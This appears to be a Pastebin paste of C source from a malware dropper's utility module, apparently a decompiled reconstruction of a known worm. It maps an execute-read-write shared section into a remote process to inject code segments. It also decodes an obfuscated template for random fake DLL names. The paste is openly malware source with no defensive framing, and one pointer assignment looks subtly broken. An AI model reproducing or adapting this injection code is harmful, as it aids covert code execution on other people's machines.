Advertisement
FlyFar

dropper_Utils.c

Feb 18th, 2023
750
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.82 KB | Cybersecurity | 0 0
  1. #include "5. Utils.h"
  2. #include "9. AssemblyBlock2.h"
  3. #include "A. EncodingAlgorithms.h"
  4. #include "C. CodeBlock.h"
  5.  
  6. #include "config.h"
  7. #include "define.h"
  8.  
  9. // 100% (C) CODE MATCH
  10. INT32 SharedMapViewOfSection(HANDLE hRemote, SIZE_T nSize, PHANDLE ppSection, PVOID *ppLocal, PVOID *ppRemote)
  11. {
  12.     SIZE_T iViewSize;           // Size of the map view
  13.     NTSTATUS nRet;              // Value returned by the functions
  14.     LARGE_INTEGER liMaxSize;    // Maximum size that can be allocated
  15.  
  16.     // Copy the values
  17.     iViewSize = nSize;
  18.    
  19.     liMaxSize.LowPart  = nSize;
  20.     liMaxSize.HighPart = 0;
  21.    
  22.     // Create a section and grant all access (read, write, execute)
  23.     nRet = _F(ZwCreateSection)(ppSection, SECTION_ALL_ACCESS, NULL, &liMaxSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, 0);
  24.     HAS_FAILED(nRet, -5)
  25.    
  26.     // Create the 1st Map View for the local process
  27.     nRet = _F(ZwMapViewOfSection)(*ppSection, GetCurrentProcess(), ppLocal , NULL, 0, NULL, &iViewSize, ViewShare, 0, PAGE_EXECUTE_READWRITE);
  28.     HAS_FAILED(nRet, -5)
  29.    
  30.     // Create the 2nd Map View for the remote process
  31.     nRet = _F(ZwMapViewOfSection)(*ppSection, hRemote            , ppRemote, NULL, 0, NULL, &iViewSize, ViewShare, 0, PAGE_EXECUTE_READWRITE);
  32.     HAS_FAILED(nRet, -5)
  33.    
  34.     return 0;
  35. }
  36.  
  37. // 99% (C) CODE MATCH
  38. void CopySegmentIntoSections(PVOID *ppLocal, PVOID lpRemote, INT32 *nGlobalPtr, PSECTION_SEGEMENT_INFO lpRemoteInfo, PVOID lpBytes, DWORD dwSize)
  39. {
  40.     // If bytes has been provided copy them in the shared section
  41.     if(dwSize)
  42.         __memcpy(*ppLocal, lpBytes, dwSize);
  43.    
  44.     // Update the information for the remote view
  45.     lpRemoteInfo->SegmentAddress = (DWORD)lpRemote + *nGlobalPtr;
  46.     lpRemoteInfo->SegmentSize = dwSize;
  47.    
  48.     // Update the local information
  49.     *ppLocal  = ppLocal + dwSize;
  50.     *nGlobalPtr += dwSize;
  51. }
  52.  
  53. const WORD ENCODED_KERNEL32_DLL_ASLR__08x[23] =
  54. {
  55.     0xAE59, 0xAE57, 0xAE40, 0xAE5C,
  56.     0xAE57, 0xAE5E, 0xAE21, 0xAE20,
  57.     0xAE3C, 0xAE56, 0xAE5E, 0xAE5E,
  58.     0xAE3C, 0xAE53, 0xAE41, 0xAE5E,
  59.     0xAE40, 0xAE3C, 0xAE37, 0xAE22,
  60.     0xAE2A, 0xAE6A, 0xAE12
  61. };
  62.  
  63. // 100% (C) CODE MATCH
  64. INT32 GetRandomModuleName(GENERAL_INFO_BLOCK *lpInfoBlock, LPCWSTR lpszLibraryName)
  65. {
  66.     WCHAR __KERNEL32_DLL_ASLR_08x[42];
  67.     DWORD dwRandom;
  68.  
  69.     // If a library name has been passed use it
  70.     if(lpszLibraryName)
  71.     {
  72.         if(lstrlenW(lpszLibraryName) >= 31)
  73.             return -1;
  74.        
  75.         lstrcpyW(lpInfoBlock->RandomLibraryName, lpszLibraryName);
  76.     }
  77.     else
  78.     {
  79.         dwRandom = GetTickCount() + 3 * GetCurrentThreadId();
  80.         DecodeModuleNameW(ENCODED_KERNEL32_DLL_ASLR__08x, __KERNEL32_DLL_ASLR_08x);
  81.        
  82.         do
  83.             wsprintfW(lpInfoBlock->RandomLibraryName, __KERNEL32_DLL_ASLR_08x, dwRandom++);
  84.         while(GetModuleHandleW(lpInfoBlock->RandomLibraryName));
  85.     }
  86.    
  87.     lpInfoBlock->OriginalAddress = (DWORD)lpInfoBlock ^ X_PTR_KEY;
  88.     lpInfoBlock->UnknownZero0 = 0;
  89.     lpInfoBlock->AlignAddressesFunction = (DWORD)BLOCK4_AlignAddresses;
  90.    
  91.     return 0;
  92. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement